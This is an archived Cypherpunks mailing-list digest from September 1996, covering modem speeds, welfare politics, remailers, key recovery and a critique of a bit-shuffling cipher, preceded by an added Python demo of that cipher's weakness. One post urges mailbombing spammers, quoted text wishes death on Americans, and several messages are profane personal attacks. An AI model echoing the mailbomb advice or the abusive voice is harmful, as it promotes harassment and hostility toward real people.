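Added example, not part of any message in this archive: Dale Thorn's "Cryptography of a sort - redux" post above describes repositioning the bits of a text with a pseudo-random generator over several passes. The Python model below is one way to write that down (the function names, the ten seeds, the sample messages and the use of Python's `random` as the generator are all assumptions); it checks that the count of one-bits survives every pass and that any number of passes composes into a single fixed permutation of bit positions.

```python
import random


def to_bits(data: bytes) -> list:
    """Expand bytes into a list of 0/1 integers, most significant bit first."""
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def from_bits(bits: list) -> bytes:
    """Pack a list of 0/1 integers (length a multiple of 8) back into bytes."""
    out = bytearray()
    for i in range(0, len(bits), 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


def pass_permutation(seed: int, n: int) -> list:
    """One pass: the seeded generator decides where each of n bits goes."""
    perm = list(range(n))
    random.Random(seed).shuffle(perm)
    return perm


def apply_perm(bits: list, perm: list) -> list:
    """Output position i receives the input bit at position perm[i]."""
    return [bits[p] for p in perm]


def invert(perm: list) -> list:
    """Permutation that undoes apply_perm(bits, perm)."""
    inverse = [0] * len(perm)
    for i, p in enumerate(perm):
        inverse[p] = i
    return inverse


def compose(perms: list) -> list:
    """Fold passes applied in list order into one equivalent permutation."""
    total = list(range(len(perms[0])))
    for perm in perms:
        total = [total[p] for p in perm]
    return total


def encrypt(data: bytes, seeds: list) -> bytes:
    bits = to_bits(data)
    for seed in seeds:
        bits = apply_perm(bits, pass_permutation(seed, len(bits)))
    return from_bits(bits)


def decrypt(data: bytes, seeds: list) -> bytes:
    """The mirror-image reversal: undo the passes in reverse order."""
    bits = to_bits(data)
    for seed in reversed(seeds):
        bits = apply_perm(bits, invert(pass_permutation(seed, len(bits))))
    return from_bits(bits)


# Constructed sample input: ten seeds in the 0..32000 range and two
# messages of equal length (the second is padded or cut to match).
SEEDS = [4711, 12, 31999, 2048, 777, 15000, 3, 27182, 9001, 16384]
MESSAGE = b"MEET AT THE USUAL PLACE AT NOON."
OTHER = b"SEND THE KEYS BY COURIER TONIGHT".ljust(len(MESSAGE), b".")[:len(MESSAGE)]


def demo() -> dict:
    n = len(MESSAGE) * 8
    combined = compose([pass_permutation(seed, n) for seed in SEEDS])
    ciphertext = encrypt(MESSAGE, SEEDS)
    other_ciphertext = encrypt(OTHER, SEEDS)
    return {
        # Reversing the passes recovers the text.
        "round_trip": decrypt(ciphertext, SEEDS) == MESSAGE,
        # Repositioning never changes how many one-bits there are.
        "ones_before": sum(to_bits(MESSAGE)),
        "ones_after": sum(to_bits(ciphertext)),
        # Ten passes equal one application of the combined permutation.
        "one_pass_equivalent":
            from_bits(apply_perm(to_bits(MESSAGE), combined)) == ciphertext,
        # The same combined permutation covers every message of this
        # length under these seeds; its inverse decrypts without the seeds.
        "combined_inverts_other":
            from_bits(apply_perm(to_bits(other_ciphertext), invert(combined))) == OTHER,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Because permutations compose, the secret that matters for a given message length is the one combined permutation rather than the list of per-pass seeds.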
From craigw at dg.ce.com.au Mon Sep 16 01:02:04 1996
From: craigw at dg.ce.com.au (craigw at dg.ce.com.au)
Date: Mon, 16 Sep 1996 16:02:04 +0800
Subject: 56 kbps modems
Message-ID: <199609160033.KAA29614@mac.ce.com.au>

well here in Australia Telstra our national carrier only "guarantees" 2400 baud to work. I live within 2km of the exchange and the best I have ever achieved was 22k/sec over the lines (usually about 18k). This is not what the modem tells you it is doing....but what you get as a result of testing the ACTUAL modem speed using a line analyzer program. What a modem manufacturer says you get and what the line gives you are Totally separate.

> People who seemed to know used to say that 'the Shannon limit' set an absolute upper limit around 40 kbps. Has Shannon been proven wrong, or what?

Soon, we may all be staring at our computers, wondering whether they're staring back.
[Network Admin For WPA Business Products. aka doshai >;-) ]
http://pip.com.au/~doshai/
Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you)

From attila at primenet.com Mon Sep 16 01:13:48 1996
From: attila at primenet.com (attila)
Date: Mon, 16 Sep 1996 16:13:48 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To:
Message-ID: <199609160537.XAA22337@InfoWest.COM>

In , on 09/15/96 at 11:17 AM, tcmay at got.net (Timothy C.
May) said: = .At 11:43 PM 9/15/96, attila wrote: = .> NO, it does not need to be or do either, BUT, it means = .> that everybody independently attempts to succeed and = .> the 'community' takes care of itself --and in the = .> standardsense, the ne'er do wells fall off the path = .> of *their own free choice.* There will always be = .> sickness and calamity, but that is what the community = .> is for. = .> = .> BTW, it still works today; I live in one of 'em. = .And lest there be any doubt, I _do_ support certain kinds of = .charities, and will not of course stop anyone from practicing = .charity. While I have no religious beliefs to speak of, OK, Tim, we're patient... we do not convert, we accept among the Saints only those who have received their own testimony. each must be free to pray as they believe. = .I strongly = .support the mechanisms some churches have for taking care of their = .own members, recruits from the street, etc. our members are our community. we believe in self-determination and that each must achieve is own greatness. we also believe in the support of the community, one and all. we do not file for government welfare. = .(Including Salvation = .Army and "mission" sorts of inner city things--note of course that = .most such entities also insist on prayer and/or Bible readings as = .part of the deal... well, we pray before our meals; we just ask that you respect our preference to pray. we do not ask you to listen; if you listen, that is for your benefit; The Salvation Army does make the men/women suffer through a short lesson and prayer. maybe just one will listen one day; that is their reward. The Salvation Army is just that: a dedicated army for the fallen. Their "commanders" live in the same general quarters. = .I wonder how long it will be before a class = .action lawsuit is filed to stop the prayer part? This would = .effectively shut the missions down, of course.) 
I doubt it would shut the Salvation Army down; that is a life long commitment and saving souls may be a mission, but not the raison d'etre of their existence. The rest of them, I suspect the loss of 'mission' might be a death knell. = .The thing about _traditional_ charity, of the religious or = .community sort, was that it was not treated as an "entitlement," as = .something the resentful masses could "demand" as part of their = ."human rights." THAT is the difference. not until FDR was there an entitlement. = .A parish priest, for example, might extend charity = .to a poor person, or a widow, or whatever, but not to an = .able-bodied person who simply decided to not work. = . that was the 'poor box' at the front of the sanctuary; the stories of the widow's mite (that and the teachings of Christ receiving the widow's mite). = .Nor to an = .unmarried woman who kept getting pregnant and having more mouths to = .feed. well, stoning has not gone out of vogue in the muslim countries. = .(I surmise that most such women either died of diseases related to = .sexual promiscuity, died in childbirth, died of disease brought on = .by malnutrition, or ended up in convents (Catholic birth control).) slave labour comes to mind... = .The point is that even in an "age of charity," strings have to be = .attached by the givers of charity. People will simply not give = .40-60% of what they earn to support a growing population of people = .who say it's their "right" to welfare, AFDC (Aid to Families with = .Dependent Children), WIC (Women, Infants, and Children), food = .stamps (*), and suchlike. = . well, so far we are, by extortion, in what is labeled as the "worlds largest voluntary tax system" the problem is that the "entitlemented" are allowed to vote, and they outnumber us. but heaven forbid that the liberal media should permit us to disenfranchise or decimate their cadres. 
= .(At certain supermarkets I sometimes shop in on the way back to my = .town, people in front of me in line put their nice cuts of meat = .down, their fine loaves of bread, their frozen dinner entrees, = .their "Ben and Jerry's Ice Cream," and then pay for it with books = .of blue "Department of Agriculture" food stamps. =. I made a sarcastic comment some month's ago to a companion as we viewed such a scene in a large supermarket (I sing bass or contrabass, and it carries). the ensuing ruckus degenerated to a small group of the incensed illegals warily looking at the man in black, black assassins lid, mirrored aviators.... intimidation is just another form of communication... = .They use their own = .cash (perhaps gotten by cashing their welfare and "disability" = .checks) to buy their smokes and booze, as food stamps are not = .allowed to be spent on this stuff. My impression is that they eat = .more expensive food than I do, they do, Tim, they do. --and more of it; the fruits of your labour! = .perhaps because they're buying the = .food with "play money," whereas I'm buying my food with money = .that's what's left after I had to pay 40-50 taxes, so I seek to = .economize when I can!) they can't add a checkbook or read to pass a driver's license, but they can count entitlement money. that's all right; after the Federal law killing the require- ment for alternative languages, you speak and write English to get a driver's license in Utah, or anything else. learn or burn. = .> Now, I don't intend to be Scrooge, but I'll fight for = .> my rights to cut off at the knees the knee-jerk = .> liberals and government slavemeisters who want to tell = .> me that I, and 2 others are required to support 100 = .> freeloaders. = .And speaking of Scrooge, I like "A Christmas Carol" about as much = .as anyone I know, and try to take the lesson of what Scrooge = .learned as a general lesson about life and living it. 
In Dickensonian (I guess it works) England, the employer was ethically charged with the care of his employees. Of course, this all fits into my concept: "in general, men are basically good --unless it involves money." Unfortunately, very few monied industrialists were charitable, and this fact gave FDR the opportunity to start the interminable dole, generation after generation of welfare _entitlements_. the lazy, the pregnant teenagers on their third child, &c. believe they are _entitled_ to pick my pocket, and your pocket. at this point < 20% of the population is supporting > 80% who are _entitled_ to my support because some bleeding heart knee jerk says so. the federal budget defines these programs as _entitlements_ --they have even dropped the pretense of calling it "aid" or "welfare." It is a separate budget class by itself and does not figure in the stated deficit. and the slimeball Clinton brought in for the Treasury, he already replaced the entitlement funds with a government IOU... Scrooge needed to receive the revelation of charity --and to accept the principle. He did. Charity is not a Christian concept; it is fundamental human characteristic present to some extent in most humans, and differentiates us from say the ants, who cannibalize their fallen comrads. I know many good, charitable individuals who are not religious, even agnostics. I've always discounted atheism as a conundrum; you can not deny before you first identify. = .(As with "Robin Hood," the message is often confused. Robin Hood = .was not "stealing from the rich," he was taking back what was = .stolen from the peasants and farmers by the King and his tax = .collectors, notably the Sheriff of Notingham. At least this is how = .I read the myth.) you bet! the Sheriff of Nottingham was _greedy_ and merciless. Robin Hood was only returning the property to the rightful owners --a lesson missed by most. the real question: just how much of a myth is it? 
the moral would not have been stated and the peasants would not have protected the "merry band" had they been plunderers of the land. = .--Tim May Oh, yes, I forgot to add a special message to "Dr. Dimitri" on his Piled higher [and] Deeper throne of cow feces, don't forget to address me as "Dr. Attila" 'cause I got a couple of them things, too. and if Tim is an old fart, what am I? I've got at least 5-10 years on Tim. --doesn't keep my hand off the cranked throttle of my 102 cu in outlaw chopper. --attila -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From stewarts at ix.netcom.com Mon Sep 16 01:25:50 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 16 Sep 1996 16:25:50 +0800 Subject: SPL -- Suspicious Persons List Message-ID: <199609160558.WAA11070@dfw-ix6.ix.netcom.com> At 09:04 PM 9/15/96 -0400, Phill wrote: >> Work for the competition, or start your own company. >Easy enough for you or me who can charge the minimum wage rate >for an hour for a period more like a minute. In this part of California, most yard work is done by small companies run by guys named Jose or Pablo, who can charge maybe 2-3x minimum at most before the competition undercuts them. And they have to worry about blacklists also - "business licenses" and "immigration papers". >... >Being opposed to government slavery isn't enough. Coorporate slavery >is just as bad. Unless people are enfranchised ecconmically as >well as politically the political liberties don't matter much. It's not corporate slavery when you don't have to work for them. >I am on an SPL that is run by an organisation called the "Ecconomic >League". It is an organisation run by the UK Conservative party >which keeps lists of "unsafe" employees. Of course the list is (Just because I don't believe in the concept of "corporate slavery" doesn't mean I don't think corporations can be offensive. This sucks...) 
Out of curiosity, I thought the UK had Data Privacy Laws or some sort of Database Cops - does that not apply to applications like this?

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From tcmay at got.net Mon Sep 16 01:32:41 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 16 Sep 1996 16:32:41 +0800
Subject: "But if it saves just one child."
Message-ID:

At 3:51 PM 9/15/96, James A. Donald wrote:
...
>Not everyone who sends food to the starving children is ultra
>respectable.
>
>Problem is that the usual cause of starving children is tyranny.
...
>It is very common for international charities to develop excessively
>friendly relationships with murderous tyrannies,

But there is a simple rationale for this behavior...

The rallying cry heard so often these days: "But if it saves just one child."

Hence the moves to ban guns, the moves to ban cigarettes, the moves to remove violent scenes from movies, books, and video games, and, yes, the close alliances between Save Our Children and the Idi Amins of the world.

(Hillary also thinks it takes a village to save the children.)

--Tim May, who thinks GAK and Position Escrow are justified if they save but one child's life.

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From mccoy at communities.com Mon Sep 16 01:45:46 1996
From: mccoy at communities.com (Jim McCoy)
Date: Mon, 16 Sep 1996 16:45:46 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To:
Message-ID:

Anonymous wrote:
>Tim May wrote:
>
>> The thing about _traditional_ charity, of the religious or community sort,
>> was that it was not treated as an "entitlement," as something the resentful
>> masses could "demand" as part of their "human rights."
>
> There's no substantial difference between their resentful whining about
>their rights and your resentful whining about your rights - except maybe
>that you whine more.

Actually there is a fundamental difference: what Tim demands is the right to be left alone and to be free from external influence as long as what he is doing does not directly hurt another, what "they" demand is to be taken care of by others because they either cannot or choose not to take care of themselves. The latter requires that someone productive (like Tim) be forced to take care of them through taxation or otherwise at gunpoint.

In most societies this is considered the difference between a child and an adult...

jim

From shamrock at netcom.com Mon Sep 16 01:47:34 1996
From: shamrock at netcom.com (Lucky Green)
Date: Mon, 16 Sep 1996 16:47:34 +0800
Subject: 56 kbps modems
In-Reply-To: <199609160033.KAA29614@mac.ce.com.au>
Message-ID:

On Mon, 16 Sep 1996 craigw at dg.ce.com.au wrote:

> well here in Australia Telstra our national carrier only "guarantees"
> 2400 baud to work. I live within 2km of the exchange and the best I
> have ever achieved was 22k/sec over the lines (usually about 18k).
> This is not what the modem tells you it is doing....but what you get
> as a result of testing the ACTUAL modem speed using a line analyzer
> program. What a modem manufacturer says you get and what the line
> gives you are Totally separate.

Seriously, how many of the 28.8 modem users get connections at 28.8? Twenty percent? Fifty percent? Today's modems are already faster than most analog lines can support. More likely than not, a 56k modem won't link up at 56k. If you want speed, use the clean solution. Get ISDN.
[And don't buy the Motorola BitSurfer PRO. It won't work with two line phones. The sound is so bad, you can't use the POTS you pull out for business. Motorola: "We are aware of the problem". Well, they have been aware of it since at least February.]

But for data, home ISDN is the way to go.

--Lucky

From attila at primenet.com Mon Sep 16 02:04:11 1996
From: attila at primenet.com (attila)
Date: Mon, 16 Sep 1996 17:04:11 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To: <199609160537.HAA26159@basement.replay.com>
Message-ID: <199609160641.AAA23324@InfoWest.COM>

In <199609160537.HAA26159 at basement.replay.com>, on 09/16/96 at 07:37 AM, nobody at replay.com (Anonymous) said:

= .Tim May wrote:
= .> The thing about _traditional_ charity, of the religious or community sort,
= .> was that it was not treated as an "entitlement," as something the resentful
= .> masses could "demand" as part of their "human rights."
= . There's no substantial difference between their resentful whining about
= .their rights and your resentful whining about your rights - except maybe
= .that you whine more.

that is worse than a cheap shot... like a man low enough to shoot another while he's taking a crap.

I'm not whining about my rights any more than Tim is whining about his. One of the principles of the American Revolution was NO TAXATION WITHOUT REPRESENTATION. When our government takes my money and creates a new class which "votes" to require me to pay for them; they are a vested interest voting only for their own gain without my consent.

human rights are supposedly universal. however, since when has an entitlement been considered a "human right?"

are you playing the part of the bleeding knee-jerk welfare advocate? The type: "I'm willing to give mine, (but I cheat on my taxes) --just make sure you let the Feds extort their welfare system from _your_ profits.

The welfare system is not only broken and bankrupt, it is a SELF EATING WATERMELON.
charity is man's _benevolence_ and, there is nothing in the scriptures which says the lazy and resentful are _entitled_ to my support.

I tithe, and tithe faithfully; and contribute a fast offering every month for the ward bishop's fund. as it says in the scriptures, he who faithfully tithes shall receive it tenfold. we take care of our own community, and we don't collect welfare. it works.

and for the paid hypocrites who pass the basket every Sunday and scream about the poor --they don't give, they want you to give.

--attila

From attila at primenet.com Mon Sep 16 02:24:23 1996
From: attila at primenet.com (attila)
Date: Mon, 16 Sep 1996 17:24:23 +0800
Subject: "But if it saves just one child."
In-Reply-To:
Message-ID: <199609160656.AAA23532@InfoWest.COM>

In , on 09/15/96 at 03:51 PM, tcmay at got.net (Timothy C. May) said:

= .The rallying cry heard so often these days: "But if it saves just one child."
= .

"...now that we have saved just one child, save another, a boy and a girl, so they breed, and we can justify our jobs feeding: "just one more child...."

"...give until you bleed."

= .(Hillary also thinks it takes a village to save the children.)

yeah, a _global_ village with good King Hillary.

welcome to "Logan's Run" (and Fahrenheit 451)

From peter at baileynm.com Mon Sep 16 04:06:58 1996
From: peter at baileynm.com (Peter da Silva)
Date: Mon, 16 Sep 1996 19:06:58 +0800
Subject: Email Robot draws fire from CypherPunkz
In-Reply-To:
Message-ID: <9609152004.AA09655@sonic.nmti.com.nmti.com>

Sneck.

The points I get out of this:

1. Cypherpunks lives up to its name. Mainly, the second part.

2. Whether an email spam is business related or not, it's neither desirable nor interesting. Two years ago having a robot like that might have been amusing. Now it's just another spam.

3. Y'all really oughta read Stand on Zanzibar again. I think you're missing the point.
From an401dws at gold.ac.uk Mon Sep 16 05:40:22 1996
From: an401dws at gold.ac.uk (Doug)
Date: Mon, 16 Sep 1996 20:40:22 +0800
Subject: New Remailers?
Message-ID: <1604.9609160953@gold.ac.uk>

OK don't shoot me, I'm new to this list so please bear with me:

I recently secured an account with anon.penet and then a few days later got a post informing me that the service was now terminated. Anybody out there know of any remailers where you don't have to have a PhD in computer science and a thorough working knowledge of PGP in order to operate? Also, are there any remailers which will accept binary attachments?

doug

From gary at systemics.com Mon Sep 16 05:49:48 1996
From: gary at systemics.com (Gary Howland)
Date: Mon, 16 Sep 1996 20:49:48 +0800
Subject: 56 kbps modems
In-Reply-To: <199609160033.KAA29614@mac.ce.com.au>
Message-ID: <323D28E8.15FB7483@systemics.com>

craigw at dg.ce.com.au wrote:
>
> well here in Australia Telstra our national carrier only "guarantees"
> 2400 baud to work.

As I am sure has been discussed at length before, baud does not equal bps. AFAIK, V32bis is only 2400baud.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown.
pub 1024/C001D00D 1996/01/22 Gary Howland
Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06

From jonathan at dcs.gla.ac.uk Mon Sep 16 05:59:31 1996
From: jonathan at dcs.gla.ac.uk (jonathan)
Date: Mon, 16 Sep 1996 20:59:31 +0800
Subject: (Long) RFC: Public Key Finger: A preliminary proposal for a distributed key publishing system
In-Reply-To: <199609151909.MAA10901@toad.com>
Message-ID:

On Sun, 15 Sep 1996, Geoff Dale wrote:

> The original (html) document may be obtained at:
>
> http://www.fqa.com/geoff/pkf.htm
>
> ---------------------------------------------------------------------------
> Version 0.2, Draft
>
> Public Key Finger
>
> (aka the People's Key Front)
>
> A preliminary proposal for a distributed key publishing system
>
> ---------------------------------------------------------------------------

[snip]

is that the Judean People's Key Front, or the People's Key Front of Judea? :-j

(old british joke, for the monty-python impaired...)

--
Jonathan AH Hogg, Computing Science, The University, Glasgow G12 8RZ, Scotland.
jonathan at dcs.gla.ac.uk http://www.dcs.gla.ac.uk/~jonathan (+44)141 3398855x2069

From dthorn at gte.net Mon Sep 16 06:20:07 1996
From: dthorn at gte.net (Dale Thorn)
Date: Mon, 16 Sep 1996 21:20:07 +0800
Subject: [Noise] Shopkeepers Preventing Riot Redistribution
In-Reply-To:
Message-ID: <323D0FAA.330E@gte.net>

Lucky Green wrote:
> On Sun, 15 Sep 1996, Jim Ray wrote:
> Indeed it was. In a beautiful-to-me scene which Miami's WSVN Channel 7
> (our big-hair station) called "chilling," Korean-American shopkeepers,
> perched atop their building with semi-automatic firearms, kept one
> block safe while the rest of the neighborhood burned without police
> protection.
> Upon being informed that this was a biased interpretation of
> legitimate actions by the merchants, which _I_ found heartwarming,
> they said that chilling was "just a word."
> What your TV station probably didn't report was that the police
> quickly showed up at the scene. To arrest the looters carrying
> crowbars and torches? Of course not. The cops came to arrest the
> "sniper". --Lucky

This fascinating aspect of law enforcement described above is something you can test for yourself:

Probably whatever state of the U.S. you (might) live in issues you a driver's license, to obtain which you read a booklet and pass a test. Get your booklet and read everything your state mandates about defensive driving, particularly in maintaining a minimum safe distance from other vehicles, given current velocities.

Now try to practice that safety on your state freeways. You will:

1. Be severely harassed, threatened, and possibly injured or killed (more-or-less deliberately) by another driver who feels it's his/her right (incorrectly of course) to mount your car anally, rather than simply go around.

2. Be harassed by the state police for "obstructing traffic" (even though the other driver initiated the problem, illegally), because after all, the state police are told (subliminally, I guess) not to protect you, but rather to keep traffic moving, which is "good for business".

3. Be charged as the party at fault when another driver runs into the back of your car, even when you are travelling in a straight line, within five MPH of the speed limit, and the freeway is practically empty. Needless to say, such a charge is not hard to turn around if you're smart and know how to write stinging letters to the insurance company, if not the state govt.

It's just interesting as hell to see the police follow a different book than their (presumed) bosses, the state govt. Common reason would suggest that the police would view a true defensive driver as a "troublemaker" (some sort of anarchist, perhaps?), and want to get that driver back into "normal" driving mode, or off the road completely.
I mention this because you can't normally test police attitudes with the gun-firing approach, but you can with a car. If my instincts prove correct, however, few people who read this post will see the reason in it, being in the majority of aggressive neurotic drivers (just a guess).

From paul at fatmans.demon.co.uk Mon Sep 16 06:27:47 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Mon, 16 Sep 1996 21:27:47 +0800
Subject: "Remailers can't afford to be choosy"
Message-ID: <842781738.23305.0@fatmans.demon.co.uk>

> > Umm.... freedom of the press is freedom for he who owns the press.
> >The remailer operators own the presses; why shouldn't they use whatever means
> >they see fit to determine how they can be used? I encourage people not to
> >discriminate on the basis of the political orientation of what's going
> >through... but spam isn't political speech. (I agree that the government
> >should not be in the business of determining what is spam and what is
> >political speech - all speech should be protected - but remailer operators
> >are not governments.)

The point here, I think, that we are failing to see is that the remailers are run on private machines and bandwidth, when you use a remailer you are a guest on someone else's property, your mail is using their bandwidth etc.
They can determine how they like how they are used, I just hope most of us will have the strength of conscience to refrain from using remailers which censor or restrict their throughput, I agree that spam is a different question but we do have our own way of dealing with this, just mailbomb the senders, if they are commercial they are likely to leave an address or telephone number on the spam even if the email address is anonymized, we have ways ;-)

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From perry at alpha.jpunix.com Mon Sep 16 07:07:33 1996
From: perry at alpha.jpunix.com (John Perry)
Date: Mon, 16 Sep 1996 22:07:33 +0800
Subject: New type2.list/pubring.mix
Message-ID: <199609161103.GAA09054@alpha.jpunix.com>

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL:

From dlv at bwalk.dm.com Mon Sep 16 08:41:44 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Sep 1996 23:41:44 +0800
Subject: China joins Singapore, Germany, ....
In-Reply-To: <842781740.23307.0@fatmans.demon.co.uk>
Message-ID:

>From paul at fatmans.demon.co.uk Mon Sep 16 04:22:40 1996
Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 16 Sep 96 07:19:49 EDT for dlv
Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA11172 for dlv at bwalk.dm.com; Mon, 16 Sep 96 04:22:40 -0400
Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net id ak07550; 15 Sep 96 13:11 GMT
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa23307; 15 Sep 96 11:02 BST
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA842732056 ; Sat, 14 Sep 96 20:14:16 +0000
Comments: Authenticated sender is
From: paul at fatmans.demon.co.uk
To: "Dr.Dimitri Vulis KOTM"
Date: Sat, 14 Sep 1996 20:14:14 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: China joins Singapore, Germany, ....
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.31)
Message-Id: <842781740.23307.0 at fatmans.demon.co.uk>

>
> Nazi POWs were Nazis and deserved to be killed. Likewise, American soldiers
> are murderous scum. I wish Saddam Hussein the best of luck in killing every
> American he can get.
>
> P.S. Please do not cc: me.

Fuck you.
Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From dlv at bwalk.dm.com Mon Sep 16 08:47:21 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Sep 1996 23:47:21 +0800
Subject: Internet Drivers' Licenses
In-Reply-To: <842781757.23377.0@fatmans.demon.co.uk>
Message-ID: <86kcuD66w165w@bwalk.dm.com>

>From paul at fatmans.demon.co.uk Mon Sep 16 04:17:55 1996
Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 16 Sep 96 07:19:56 EDT for dlv
Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10926 for dlv at bwalk.dm.com; Mon, 16 Sep 96 04:17:55 -0400
Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net id ak19657; 15 Sep 96 11:16 GMT
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa23377; 15 Sep 96 11:02 BST
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id
AA842732060 ; Sat, 14 Sep 96 20:14:20 +0000
Comments: Authenticated sender is
From: paul at fatmans.demon.co.uk
To: "Dr.Dimitri Vulis KOTM"
Date: Sat, 14 Sep 1996 20:14:14 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: Internet Drivers' Licenses
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.31)
Message-Id: <842781757.23377.0 at fatmans.demon.co.uk>

> This is the kind of project cypherpunks would do if they were writing code,
> instead of lies and personal attacks, the way Tim May (fart) does.

Is a Tim May reference compulsory in all of your postings you stupid little man?

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From jya at pipeline.com Mon Sep 16 08:52:42 1996
From: jya at pipeline.com (John Young)
Date: Mon, 16 Sep 1996 23:52:42 +0800
Subject: IBM_gak
Message-ID:
<199609161225.MAA10936@pipe1.ny3.usa.pipeline.com>

9-15-96. PcWe:

"IBM Boosts Encryption Initiative"

IBM security initiatives next month will include a new way to build encryption into software and technology that could enable U.S. companies to export products with strong encryption algorithms. IBM also will introduce several "key-recovery" technologies that could enable businesses to satisfy the requirement imposed by the U.S. government that it be able to access encrypted data on demand. IBM is attempting to garner industry support for the new key-recovery technology and is expected to license the technology to Netscape and Sun.

9-13-96. BuWi:

"Revolutionary Intranet security product to be demonstrated at Interop DotCom"

DSN's NetFortress fully automates hardware-based authentication, encryption and key exchange into a plug and play solution. It completely eliminates the possibility of IP spoofing, eavesdropping and break-ins. "After installing it, I couldn't even tell which service a given packet was from - everything but the packet header itself was rendered undecipherable as it traversed the Internet." DSN Technology was founded by Dr. Aharon Friedman and Andy Savas.
-----

http://jya.com/ibmgak.txt (6 kb for 2)

IBM_gak

From dlv at bwalk.dm.com Mon Sep 16 08:59:18 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Sep 1996 23:59:18 +0800
Subject: Internet Drivers' Licenses
In-Reply-To: <842781779.23486.0@fatmans.demon.co.uk>
Message-ID: <43kcuD64w165w@bwalk.dm.com>

>From paul at fatmans.demon.co.uk Mon Sep 16 05:27:03 1996
Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 16 Sep 96 07:19:42 EDT for dlv
Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA14516 for dlv at bwalk.dm.com; Mon, 16 Sep 96 05:27:03 -0400
Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net id ak19721; 15 Sep 96 11:16 GMT
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa23486; 15 Sep 96 11:02 BST
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA842733091 ; Sat, 14 Sep 96 20:31:31 +0000
Comments: Authenticated sender is
From: paul at fatmans.demon.co.uk
To: "Dr.Dimitri Vulis KOTM"
Date: Sat, 14 Sep 1996 20:31:31 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: Internet Drivers' Licenses
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.31)
Message-Id: <842781779.23486.0 at fatmans.demon.co.uk>

> mpd at netcom.com (Mike Duvos) writes:
> > A given key could mean "I am Mike Duvos", "I am Tim May"
>
> Fart.

How long is it going to take for you to grow up you trailer butt-fucker?
Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From m5 at tivoli.com Mon Sep 16 10:04:10 1996
From: m5 at tivoli.com (Mike McNally)
Date: Tue, 17 Sep 1996 01:04:10 +0800
Subject: Cryptography of a sort - redux
In-Reply-To: <323CADBE.3D54@gte.net>
Message-ID: <323D53EC.298E@tivoli.com>

Dale Thorn wrote:
>
> The only way to recover the original text is to reposition the
> shuffled bits correctly, which requires brute-force guessing of the
> pseudo-random-number output.

Even if I know the PRNG algorithm? And just what is it that you propose to use for the PRNG?

> This guess is very simple for the first encoding layer, but
> compounds exponentially in subsequent encodings

Exponentially? Could you provide the math to explain how your composition of PRNG's gives this exponential increase in difficulty?
> , so
> that after half a dozen or a dozen passes, where the executable
> program(s) is called from scratch for each pass, the shuffling rapidly
